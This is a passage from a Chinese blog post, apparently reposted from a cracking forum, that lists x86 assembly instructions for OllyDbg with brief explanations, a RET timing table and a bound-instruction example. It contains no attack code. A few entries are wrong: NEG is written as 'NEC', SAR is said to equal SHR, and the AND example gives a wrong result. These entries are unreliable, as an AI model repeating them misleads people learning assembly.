加法的十进制调整. </span><br><span class="line">SUB 减法. </span><br><span class="line">SBB 带借位减法. </span><br><span class="line">DEC 减 1. </span><br><span class="line">NEC 求反(以 0 减之). </span><br><span class="line">CMP 比较.(两操作数作减法,仅修改标志位,不回送结果). </span><br><span class="line">AAS 减法的ASCII码调整. </span><br><span class="line">DAS 减法的十进制调整. </span><br><span class="line">MUL 无符号乘法. </span><br><span class="line">IMUL 整数乘法. </span><br><span class="line">以上两条,结果回送AH和AL(字节运算),或DX和AX(字运算), </span><br><span class="line">AAM 乘法的ASCII码调整. </span><br><span class="line">DIV 无符号除法. </span><br><span class="line">IDIV 整数除法. </span><br><span class="line">OD常用汇编指令集详解.txt[2016-08-27 09:49:03]</span><br><span class="line">以上两条,结果回送: </span><br><span class="line">商回送AL,余数回送AH, (字节运算); </span><br><span class="line">或 商回送AX,余数回送DX, (字运算). </span><br><span class="line">AAD 除法的ASCII码调整. </span><br><span class="line">CBW 字节转换为字. (把AL中字节的符号扩展到AH中去) </span><br><span class="line">CWD 字转换为双字. (把AX中的字的符号扩展到DX中去) </span><br><span class="line">CWDE 字转换为双字. (把AX中的字符号扩展到EAX中去) </span><br><span class="line">CDQ 双字扩展. (把EAX中的字的符号扩展到EDX中去) </span><br><span class="line">三、逻辑运算指令 </span><br><span class="line">AND 与运算/按位与. </span><br><span class="line">(举例:OB11000100 AND OB01110010</span><br><span class="line">的值为OB0100000,两者相同位置是0和1取0,1和1取1,0,0取0,当且仅当对应位都取1时结果为1)</span><br><span class="line">OR 或运算/按位或. </span><br><span class="line">(举例:10100101 OR 00001011</span><br><span class="line">的值为10101111,两者相同位置是0和1取1,1和1取1,0,0取0,被比较对象的相应位置只要出现1就取1)</span><br><span class="line">XOR 异或运算. (当A、B两个不同时结果为1,否则为0)</span><br><span class="line">NOT 取反. </span><br><span class="line">TEST 测试.(两操作数作与运算,仅修改标志位,不回送结果). </span><br><span class="line">SHL 逻辑左移. </span><br><span class="line">SAL 算术左移.(=SHL) </span><br><span class="line">SHR 逻辑右移. </span><br><span class="line">SAR 算术右移.(=SHR) </span><br><span class="line">ROL 循环左移. </span><br><span class="line">ROR 循环右移. </span><br><span class="line">RCL 通过进位的循环左移. </span><br><span class="line">RCR 通过进位的循环右移. </span><br><span class="line">以上八种移位指令,其移位次数可达255次. </span><br><span class="line">移位一次时, 可直接用操作码. 如 SHL AX,1. </span><br><span class="line">移位>1次时, 则由寄存器CL给出移位次数. </span><br><span class="line">如 MOV CL,04 </span><br><span class="line">SHL AX,CL </span><br><span class="line">四、串指令 </span><br><span class="line">DS:SI 源串段寄存器 :源串变址. </span><br><span class="line">OD常用汇编指令集详解.txt[2016-08-27 09:49:03]</span><br><span class="line">ES:DI 目标串段寄存器:目标串变址. </span><br><span class="line">CX 重复次数计数器. </span><br><span class="line">AL/AX 扫描值. </span><br><span class="line">D标志 0表示重复操作中SI和DI应自动增量; 1表示应自动减量. </span><br><span class="line">Z标志 用来控制扫描或比较操作的结束. </span><br><span class="line">MOVS 串传送. </span><br><span class="line">( MOVSB 传送字符. MOVSW 传送字. MOVSD 传送双字. ) </span><br><span class="line">CMPS 串比较. </span><br><span class="line">( CMPSB 比较字符. CMPSW 比较字. ) </span><br><span class="line">SCAS 串扫描. </span><br><span class="line">把AL或AX的内容与目标串作比较,比较结果反映在标志位. </span><br><span class="line">LODS 装入串. </span><br><span class="line">把源串中的元素(字或字节)逐一装入AL或AX中. </span><br><span class="line">( LODSB 传送字符. LODSW 传送字. LODSD 传送双字. ) </span><br><span class="line">STOS 保存串. </span><br><span class="line">是LODS的逆过程. </span><br><span class="line">REP</span><br><span class="line">当CX/ECX<>0时重复. </span><br><span class="line">REPE/REPZ 当ZF=1或比较结果相等,且CX/ECX<>0时重复. </span><br><span class="line">REPNE/REPNZ 当ZF=0或比较结果不相等,且CX/ECX<>0时重复. </span><br><span class="line">REPC</span><br><span class="line">当CF=1且CX/ECX<>0时重复. </span><br><span class="line">REPNC</span><br><span class="line">当CF=0且CX/ECX<>0时重复. </span><br><span class="line">五、程序转移指令 </span><br><span class="line"> 1>无条件转移指令 (长转移) </span><br><span class="line">JMP 无条件转移指令 </span><br><span class="line">CALL 过程调用 </span><br><span class="line">RET/RETF过程返回.</span><br><span class="line">RETN:</span><br><span class="line">add sp,n(n为偶数)</span><br><span class="line">ret</span><br><span class="line">/* RET/RETN/RETF Return from procedure</span><br><span class="line"></span><br><span class="line"> variations/</span><br><span class="line"> operands bytes 8088 186 286 386 486 Pentium</span><br><span class="line"> retn 1 20 16 11+m 10+m 5 2 NP</span><br><span class="line"> retn imm16 1+d(2) 24 18 11+m 10+m 5 3 NP</span><br><span class="line"> retf 1 34 22 15+m 18+m 13 4 NP</span><br><span class="line"> retf imm16 1+d(2) 33 25 15+m 18+m 14 4 NP</span><br><span class="line"></span><br><span class="line"> RET is coded by the assembler as near or far based on the</span><br><span class="line"> procedure declaration and program model, as:</span><br><span class="line"></span><br><span class="line"> RETN (return near)</span><br><span class="line"> RETF (return far)</span><br><span class="line"></span><br><span class="line"> Example: ret</span><br><span class="line"></span><br><span class="line"> Protected Mode</span><br><span class="line"></span><br><span class="line"> variations/</span><br><span class="line"> operands bytes 286 386 486 Pentium</span><br><span class="line"> retf 1 25+m/55 32+m/62 18/33 4-13/23 NP</span><br><span class="line"> retf imm16 1+d(2) 25+m/55 32+m/68 17/33 4-13/23 NP</span><br><span class="line"></span><br><span class="line"> cycles for: same privilege level/lower privilege level */</span><br><span class="line"> 2>条件转移指令 (短转移,-128到+127的距离内) </span><br><span class="line">( 当且仅当(SF XOR OF)=1时,OP1<OP2 ) </span><br><span class="line">JA/JNBE 不小于或不等于时转移. </span><br><span class="line">JAE/JNB 大于或等于转移. </span><br><span class="line">OD常用汇编指令集详解.txt[2016-08-27 09:49:03]</span><br><span class="line">JB/JNAE 小于转移. </span><br><span class="line">JBE/JNA 小于或等于转移. </span><br><span class="line">以上四条,测试无符号整数运算的结果(标志C和Z). </span><br><span class="line">JG/JNLE 大于转移. </span><br><span class="line">JGE/JNL 大于或等于转移. </span><br><span class="line">JL/JNGE 小于转移. </span><br><span class="line">JLE/JNG 小于或等于转移. </span><br><span class="line">以上四条,测试带符号整数运算的结果(标志S,O和Z). </span><br><span class="line">JE/JZ 等于转移. </span><br><span class="line">JNE/JNZ 结果不为0时转移(JNZ/JNZ 地址). </span><br><span class="line">JC 有进位时转移. </span><br><span class="line">JNC 无进位时转移. </span><br><span class="line">JNO 不溢出时转移. </span><br><span class="line">JNP/JPO 奇偶性为奇数时转移. </span><br><span class="line">JNS 符号位为 "0" 时转移. </span><br><span class="line">JO 溢出转移. </span><br><span class="line">JP/JPE 奇偶性为偶数时转移. </span><br><span class="line">JS 符号位为 "1" 时转移. </span><br><span class="line"> 3>循环控制指令(短转移) </span><br><span class="line">LOOP CX不为零时循环(在实地址模式下使用16位CX寄存器而不是ECX寄存器作为计数器). </span><br><span class="line">LOOPW: CX不为零时循环(在任何模式下都会使用16位CX寄存器作为计数器).</span><br><span class="line">LOOPD CX不为零时循环(在任何模式下都会使用32位ECX寄存器作为计数器).</span><br><span class="line">LOOPE/LOOPZ CX不为零且标志Z=1时循环. </span><br><span class="line">LOOPNE/LOOPNZ CX不为零且标志Z=0时循环. </span><br><span class="line">JCXZ CX为零时转移. </span><br><span class="line">JECXZ ECX为零时转移. </span><br><span class="line"> 4>中断指令 </span><br><span class="line">INT 中断指令 </span><br><span class="line">向CPU发送中断.</span><br><span class="line">格式为INT vec.</span><br><span class="line">vec为中断向量号,其值为0~255。CPU根据这个向量号去调用内核对应的中断例程。指令操作为: </span><br><span class="line">(SP)←(SP)-2,((SP)+1:(SP))←(FR) (IF)←0,(TF)←0 (SP)←(SP)-2,</span><br><span class="line">((SP)+1:(SP))←(CS) (SP)←(SP)-2,((SP)+1:(SP))←(IP) (CS)←(vec*4+2),</span><br><span class="line">(IP)←(vec*4) INT vec 指令只影响IF和TF(将其置零).</span><br><span class="line">INTO 溢出中断 </span><br><span class="line">IRET 中断返回 </span><br><span class="line"> 5>处理器控制指令 </span><br><span class="line">HLT 处理器暂停, 直到出现中断或复位信号才继续. </span><br><span class="line">WAIT 当芯片引线TEST为高电平时使CPU进入等待状态. </span><br><span class="line">OD常用汇编指令集详解.txt[2016-08-27 09:49:03]</span><br><span class="line">ESC 转换到外处理器. </span><br><span class="line">LOCK 封锁总线. </span><br><span class="line">NOP 空操作. </span><br><span class="line">STC 置进位标志位. </span><br><span class="line">CLC 清进位标志位. </span><br><span class="line">CMC 进位标志取反. </span><br><span class="line">STD 置方向标志位. </span><br><span class="line">CLD 清方向标志位. </span><br><span class="line">STI 置中断允许位. </span><br><span class="line">CLI 清中断允许位. </span><br><span class="line"> 6>较不常见指令</span><br><span class="line">DW : </span><br><span class="line">[标号:]</span><br><span class="line">DW 表达式[, 表达式...] 定义一列字数值。//////***方括号内的是可以没有的***//////</span><br><span class="line">DD :</span><br><span class="line">[标号:]</span><br><span class="line">DD 表达式[, 表达式...] 定义一列双字型数值。//////***方括号内的是可以没有的***//////</span><br><span class="line">DB :</span><br><span class="line">[标号:]</span><br><span class="line">DB 表达式[, 表达式...] 定义一列字节型数值DB 指令以表达式的值的字节形式初始化代码空间.</span><br><span class="line">(格式: [标号:] DB 表达式表</span><br><span class="line">表达式中可包含符号、字符串、或表达式等项,各个项之间用逗号隔开,字符串应用引号括起来。</span><br><span class="line">括号内的标号是可选项,如果使用了标号,则标号的值将是表达式表中第一字节的地址。</span><br><span class="line">DB 指令必须位于 CODE 段之内,否则将会发生错误.</span><br><span class="line">例</span><br><span class="line">TABLE:</span><br><span class="line">DB 0C0H, 0F9H, 0A4H</span><br><span class="line">TABLE1:</span><br><span class="line">DB " WEINA ")//////***方括号内的是可以没有的***//////</span><br><span class="line">bound 指令边界检查指令 </span><br><span class="line">可以分为16位或32位,下面以32位为例说明 </span><br><span class="line"></span><br><span class="line">bound dest , src </span><br><span class="line">if( (dest < src[0] ) | (dest > src[1]) ) </span><br><span class="line"> int 5 //触发int 5 异常,一般是由设定的SEH处理 </span><br><span class="line">endif </span><br><span class="line"></span><br><span class="line">另:引用看雪上的一个回答,意思与此相同 </span><br><span class="line">bound ebp, qword ptr [ecx+6E] </span><br><span class="line"></span><br><span class="line">cmp ebp, dword ptr [ecx+6Eh] </span><br><span class="line"> jge GoodBoy </span><br><span class="line"> cmp ebp, dword ptr [ecx+72h] </span><br><span class="line"> jle GoodBoy </span><br><span class="line"> int 05h </span><br><span class="line">GoodBoy:</span><br><span class="line"></span><br><span class="line">enter /leave 指令(enter cnt1, cnt2)其中cnt1表示框架的大小,即子程序中需要放在栈中局部变量的字节数,cnt2 是立即数,表示子程序嵌套级别,即从调用框架复制到当前框架的指针数。一般为0(这里什么原因还是不很清楚)</span><br><span class="line"></span><br><span class="line">enter <------> push ebp </span><br><span class="line"></span><br><span class="line"> mov ebp,esp</span><br><span class="line"></span><br><span class="line"> sub esp,cnt1</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">leave <------->mov esp,ebp</span><br><span class="line"></span><br><span class="line"> pop ebp</span><br><span class="line">七、伪指令 </span><br><span class="line">DW 定义字(2字节). </span><br><span class="line">PROC 定义过程. </span><br><span class="line">ENDP 过程结束. </span><br><span class="line">SEGMENT 定义段. </span><br><span class="line">ASSUME 建立段寄存器寻址. </span><br><span class="line">ENDS 段结束. </span><br><span class="line">END 程序结束. </span><br></pre></td></tr></table></figure>
<p>转自:<a target="_blank" rel="noopener" href="https://www.52pojie.cn/forum.php?mod=viewthread&tid=587759">整理了一些汇编语言的指令供参考 52pojie.cn</a></p>
</div>
<div class="article-info article-info-index">
<div class="article-category tagcloud">
<a class="article-category-link" href="/categories/crack/">crack</a>
</div>
<div class="article-tag tagcloud">
<ul class="article-tag-list" itemprop="keywords"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/asm/" rel="tag">asm</a></li><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/crack/" rel="tag">crack</a></li><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/%E5%B8%B8%E7%94%A8%E5%91%BD%E4%BB%A4/" rel="tag">常用命令</a></li></ul>
</div>
<div class="clearfix"></div>
</div>
</div>
</article>
<article id="post-Typora写文章" class="article article-type-post" itemscope itemprop="blogPost">
<div class="article-meta">
<a href="/2019/05/01/Typora%E5%86%99%E6%96%87%E7%AB%A0/" class="article-date">
<time datetime="2019-05-01T10:42:48.000Z" itemprop="datePublished">2019-05-01</time>
</a>
</div>